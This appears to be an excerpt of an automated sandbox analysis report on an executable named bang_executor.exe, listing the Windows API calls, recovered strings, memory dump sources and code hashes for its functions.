                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: dcb1197885b02725990b5725cdd42c31bd63685bd86383c2b5d495c882c032a1
                                        • Instruction ID: 9fa591bdc0157f0395054de2c5a1d217f79aa7f09bb506b207fa8eeb569bba77
                                        • Opcode Fuzzy Hash: dcb1197885b02725990b5725cdd42c31bd63685bd86383c2b5d495c882c032a1
                                        • Instruction Fuzzy Hash: 6651BE76601A07AFDB298F54D845BAFBBA4FF84350F244929E906572D1F771AC80CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0050E589
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050E5AC
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0050E5D2
                                        • _free.LIBCMT ref: 0050E5E5
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0050E5F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 4c57ad4ad70a0209cbaa48bb04e53f9fc86553e6e6d27cdf8b7f8a9fb933d96d
                                        • Instruction ID: 18413445689f22e5e8014b64b54ed4aaee1d0ee8939233aed5ff0180ec9221ea
                                        • Opcode Fuzzy Hash: 4c57ad4ad70a0209cbaa48bb04e53f9fc86553e6e6d27cdf8b7f8a9fb933d96d
                                        • Instruction Fuzzy Hash: F401D4726012127FA7315BB65C8ECBF6E6DFFC2B683240929F805C2281FE608D01D1B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0050BC80,0050D7D8,?,0050B9D3,00000001,00000364,?,0050688D,?,?,005250C4), ref: 0050BA2E
                                        • _free.LIBCMT ref: 0050BA63
                                        • _free.LIBCMT ref: 0050BA8A
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA97
                                        • SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BAA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 0f41cfa5ab3e1588f46e0b341e76fb8064c5f73eb8c6da790434e9958abdda59
                                        • Instruction ID: 7872702aa6c8fc1abf6672f654df3cbec8a687f343271e7c631768c5fe08f8fd
                                        • Opcode Fuzzy Hash: 0f41cfa5ab3e1588f46e0b341e76fb8064c5f73eb8c6da790434e9958abdda59
                                        • Instruction Fuzzy Hash: BF01D136349A02BBE216A7785DCAAAE2E6EFFD13B17250424F509D21D1EB618C066120
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004F32AF: ResetEvent.KERNEL32(?), ref: 004F32C1
                                          • Part of subcall function 004F32AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004F32D5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000,08ADEBCE,?,?,00000001,?,005152FF,000000FF,?,004F43C0,?,00000000,?,004E4766), ref: 004F3007
                                        • CloseHandle.KERNEL32(?,?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001), ref: 004F3021
                                        • DeleteCriticalSection.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F303A
                                        • CloseHandle.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F3046
                                        • CloseHandle.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F3052
                                          • Part of subcall function 004F30CA: WaitForSingleObject.KERNEL32(?,000000FF,004F31E7,?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30D0
                                          • Part of subcall function 004F30CA: GetLastError.KERNEL32(?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: 859b46f3cd82e698fadc5897a46b835c84eac9454b9fdff8a843b0546c0f6357
                                        • Instruction ID: c087660fe49aba48abceafeaa0ca6d9d01c81a0323cf2f3c5a093b9d25585b01
                                        • Opcode Fuzzy Hash: 859b46f3cd82e698fadc5897a46b835c84eac9454b9fdff8a843b0546c0f6357
                                        • Instruction Fuzzy Hash: 0311A176400744EFC7229F64DC88FD6BBA9FB18711F01492AF26A92160CB75AA489B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _free.LIBCMT ref: 0050EE67
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050EE79
                                        • _free.LIBCMT ref: 0050EE8B
                                        • _free.LIBCMT ref: 0050EE9D
                                        • _free.LIBCMT ref: 0050EEAF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 910f8c24e62e36990d87c2ebb0289955bb195d4deb6a0d6890ab79bb5b6ca7e2
                                        • Instruction ID: a99dd1db8192acca69a5530468e24a0ba54ec733ad005951769b82bb5e945f65
                                        • Opcode Fuzzy Hash: 910f8c24e62e36990d87c2ebb0289955bb195d4deb6a0d6890ab79bb5b6ca7e2
                                        • Instruction Fuzzy Hash: 4BF0EC32604205AFD664EBA9E9C7C9E7BEEBF51710B650C05F44DD7580CB70FC849A50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004FC629: GetDC.USER32(00000000), ref: 004FC62D
                                          • Part of subcall function 004FC629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004FC638
                                          • Part of subcall function 004FC629: ReleaseDC.USER32(00000000,00000000), ref: 004FC643
                                        • GetObjectW.GDI32(?,00000018,?), ref: 004FC7E0
                                          • Part of subcall function 004FCA67: GetDC.USER32(00000000), ref: 004FCA70
                                          • Part of subcall function 004FCA67: GetObjectW.GDI32(?,00000018,?), ref: 004FCA9F
                                          • Part of subcall function 004FCA67: ReleaseDC.USER32(00000000,?), ref: 004FCB37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ($fP
                                        • API String ID: 1061551593-3307054429
                                        • Opcode ID: ea70640e8b99e491fed9ee3de3355233e166bb654d467b05a4cf0b11ea87e268
                                        • Instruction ID: ddbb488d5fc21a97ed0f618a45275473def3ad59d7c9dfa32ca63439cb6ce728
                                        • Opcode Fuzzy Hash: ea70640e8b99e491fed9ee3de3355233e166bb654d467b05a4cf0b11ea87e268
                                        • Instruction Fuzzy Hash: 5F91F2756083589FD610DF29C884E6BBBE8FFD9B04F00491EF59AD3260CB74A905CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: 3f3a25aa46b1a8ee9dc90056fd572c8a4cfbd00b91ccfe336c21be01f150571c
                                        • Instruction ID: f50a271fe1ab617bd189d44738c8342f9af4aff9e9f85e2f4bfa6baa93337410
                                        • Opcode Fuzzy Hash: 3f3a25aa46b1a8ee9dc90056fd572c8a4cfbd00b91ccfe336c21be01f150571c
                                        • Instruction Fuzzy Hash: 295149F564830CFAF6207F958D42F767AE5AB09F06F20840BB386640D1C6ED9741AA1F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\bang_executor.exe,00000104), ref: 0050A800
                                        • _free.LIBCMT ref: 0050A8CB
                                        • _free.LIBCMT ref: 0050A8D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\bang_executor.exe
                                        • API String ID: 2506810119-1757287928
                                        • Opcode ID: 49c391ed75dcfb56fe71499a933155e880a9f672b6567b948d1d9aa0c26a4086
                                        • Instruction ID: a3412d4cc3f9b507f8ad46ac1704159696a73931b030c8c08e3e9201db1a68a8
                                        • Opcode Fuzzy Hash: 49c391ed75dcfb56fe71499a933155e880a9f672b6567b948d1d9aa0c26a4086
                                        • Instruction Fuzzy Hash: 95319D71A00319EFEB21DF99D885ADEBFFCFF95314B108066E90497281D6704E45DBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0050581B
                                        • _abort.LIBCMT ref: 00505926
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: 514a8ff19b02d9074e42918e1de2a95e2f440ecf6cc11d4f71ea3ffcf331a4a1
                                        • Instruction ID: 8c409e06988177979222587ea7d1d18b76cf8c9e726278b545e004f008ca96fd
                                        • Opcode Fuzzy Hash: 514a8ff19b02d9074e42918e1de2a95e2f440ecf6cc11d4f71ea3ffcf331a4a1
                                        • Instruction Fuzzy Hash: 5541277290060AEFCF15DF94CC85AAEBFB5FF48314F288599F904A6291E3359950DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __fprintf_l.LIBCMT ref: 004EF82D
                                        • _strncpy.LIBCMT ref: 004EF871
                                          • Part of subcall function 004F3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,004EF801,00000000,00000000,?,00525070,?,004EF801,?,?,00000050,?), ref: 004F3F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: 935cfa916ee79d3475b8c8ae2e2a79b783cdb77bb6896725570fd2dccca5f6ba
                                        • Instruction ID: 69016e93b90537870377250be424cf253e35a5ec3492f72053ed7f662ccd950f
                                        • Opcode Fuzzy Hash: 935cfa916ee79d3475b8c8ae2e2a79b783cdb77bb6896725570fd2dccca5f6ba
                                        • Instruction Fuzzy Hash: 7A21A172900349ABEB20EFA5CC05BBF77A8BF15300F44052BF91192291E775E9098B59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FCE28
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004FCE3D
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004FCE52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: f4c451c1979091ea8fe609c263042535a68bf8b0304108829f19ee16f853abfd
                                        • Instruction ID: eb78dd94aae56fdc66e068e3eb90dc0ef404bdc67f9b65a83f5858f3106f56d1
                                        • Opcode Fuzzy Hash: f4c451c1979091ea8fe609c263042535a68bf8b0304108829f19ee16f853abfd
                                        • Instruction Fuzzy Hash: 9B11E43664020CAFD2219F69DE88FBB3B69FB5BB04F000406F301A71A5C7695909D7A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F61
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F6B
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F7B
                                        Strings
                                        • Thread pool initialization failed., xrefs: 004F2F93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: c930e6dfd1b518671c463a2b23daaaba230e3b3a6d4550d6340c84a6ea20d8d9
                                        • Instruction ID: 2ad21e5c22e3f5fb9b045ebd786b83ee65a5f71b48307d65c25a6ecfd91aa6c9
                                        • Opcode Fuzzy Hash: c930e6dfd1b518671c463a2b23daaaba230e3b3a6d4550d6340c84a6ea20d8d9
                                        • Instruction Fuzzy Hash: C81182B1604709AFC3215F6A9D849A7FBECFB59354F10482FF1DA82200D6B559409B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: efee656b113bf762365e56a459de5af75ab5a5cf9956c80ea6460b1f23955033
                                        • Instruction ID: 49562fb92eb28ecb73281790de04a9739dfa47976f0c27ee282e42b7f600d07a
                                        • Opcode Fuzzy Hash: efee656b113bf762365e56a459de5af75ab5a5cf9956c80ea6460b1f23955033
                                        • Instruction Fuzzy Hash: B4019E75608108AFDB219F24EC48BBB7FB4BF2A795F140425F905922B0D7318859EBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 004E4B42
                                          • Part of subcall function 0050106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00501079
                                          • Part of subcall function 0050106D: ___delayLoadHelper2@8.DELAYIMP ref: 0050109F
                                        • std::_Xinvalid_argument.LIBCPMT ref: 004E4B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                        • String ID: string too long$vector too long
                                        • API String ID: 2355824318-1617939282
                                        • Opcode ID: 6ce201a05c93a4e193ad6175ba1cb7695a9a2a251eb14b3c38b6717801fbde24
                                        • Instruction ID: 87a98eb13f35e9ef9c5ab461a052b260d177784bea351853f2eb84744e0bf25b
                                        • Opcode Fuzzy Hash: 6ce201a05c93a4e193ad6175ba1cb7695a9a2a251eb14b3c38b6717801fbde24
